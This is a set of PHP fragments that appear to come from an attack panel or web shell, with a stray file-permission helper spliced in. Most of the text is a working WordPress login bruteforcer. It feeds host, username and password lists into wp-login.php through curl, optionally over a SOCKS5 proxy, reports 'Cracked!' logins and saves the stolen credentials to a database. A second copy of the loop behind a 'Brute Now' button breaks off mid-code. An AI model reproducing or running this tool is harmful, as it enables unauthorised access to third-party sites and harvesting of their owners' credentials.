function wp_brute() { if (isset($_POST['hosts']) && isset($_POST['passwords']) && isset($_POST['usernames'])) { $conn = new mysqli(SQL_HOST, SQL_USER, SQL_PWD, SQL_DB); $hosts = trim(filter($_POST['hosts'])); $passwords = trim(filter($_POST['passwords'])); $usernames = trim(filter($_POST['usernames'])); if ($passwords && $usernames && $hosts) { $hostsx = explode("\n", $hosts); $usersx = explode("\n", $usernames); $passsx = explode("\n", $passwords); echo '<div class="post">'; echo '<h2 class="title"><a href="#">Results</a></h2>'; echo '<div class="entry">'; echo '<p class="meta"> Wordpress CMS Bruteforce • Broken credentials will be stored in database'; foreach ($hostsx as $host) { $host = RemoveLastSlash($host); $hxd = 0; $host = str_replace(array("http://", "https://", "www."), "", trim($host)); $host = "http://" . $host; $wpAdmin = $host . '/wp-admin/'; if (!url_exists($host . "/wp-login.php")) { echo "<p>" . $host . " - <font color='#990000'>Login page not found</font></p>"; ob_flush(); flush(); continue; } foreach ($usersx as $username) { foreach ($passsx as $password) { $ch = curl_init(); if (USE_PROXY == 1) { curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); curl_setopt($ch, CURLOPT_PROXY, PROXY_IP . ':' . PROXY_PORT); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php'); curl_setopt($ch, CURLOPT_COOKIEJAR, "coki.txt"); curl_setopt($ch, CURLOPT_COOKIEFILE, "coki.txt"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_POSTFIELDS, "log=" . $username . "&pwd=" . $password . "&wp-submit=Giri‏" . "&redirect_to=" . $wpAdmin . "&testcookie=1"); $login = curl_exec($ch); if (eregi("profile.php", $login)) { $hxd = 1; echo "<p>" . $host . " - Cracked! Username - <font color='#990000'>" . $username . "</font> & Password : <font color='#990000'>" . $password . "</font></p>"; mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string($host) . ":80', '" . mysql_escape_string($username) . ":" . mysql_escape_string($password) . "')", $conn); ob_flush(); flush(); break; } } if ($hxd == 1) { break; } } if ($hxd == 0) { echo "<p>" . $host . " - <font color='#990000'>Failed</font></p>"; ob_flush(); flush(); } } echo '</div></div>'; } else { echo "<h2><font color='#990000'>All fields are required!</font></h3>"; } } mysqli_close($conn); }
/** * Проверяет возможность создания папки или файла. * Если предполагается что файл или папка будет создаваться в папке в которую нет прав на запись, возвращается false. * * @param $FileName * @return bool */ function IsPossiblyCreated($FileName) { $FileName = RemoveLastSlash($FileName); $path = GetPathName($FileName, false); if (is_dir($path)) { return is_writable($path); } $len = substr_count($path, '/'); for ($i = 0; $i < $len; $i++) { $pos = strrpos($path, '/'); $path = substr($path, 0, $pos); if (is_dir($path)) { return is_writable($path); } } return is_writable('.'); }
888888 999999'; } echo '</textarea></td> </tr> <tr><td colspan="4"><center><br><input class="inputzbut" type="submit" name="submit" value="Brute Now" /></center>'; if ($_POST) { $hosts = trim(filter($_POST['hosts'])); $passwords = trim(filter($_POST['passwords'])); $usernames = trim(filter($_POST['usernames'])); if ($passwords && $usernames && $hosts) { $hosts_explode = explode("\n", $hosts); $usernames_explode = explode("\n", $usernames); $passwords_explode = explode("\n", $passwords); foreach ($hosts_explode as $host) { $host = RemoveLastSlash($host); $hacked = 0; $host = str_replace(array("http://", "https://", "www."), "", trim($host)); $host = "http://" . $host; $wpAdmin = $host . '/wp-admin/'; if (!url_exists($host . "/wp-login.php")) { echo "<p>" . $host . " => <font color='red'>Error In Login Page !</font></p>"; ob_flush(); flush(); continue; } foreach ($usernames_explode as $username) { foreach ($passwords_explode as $password) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php');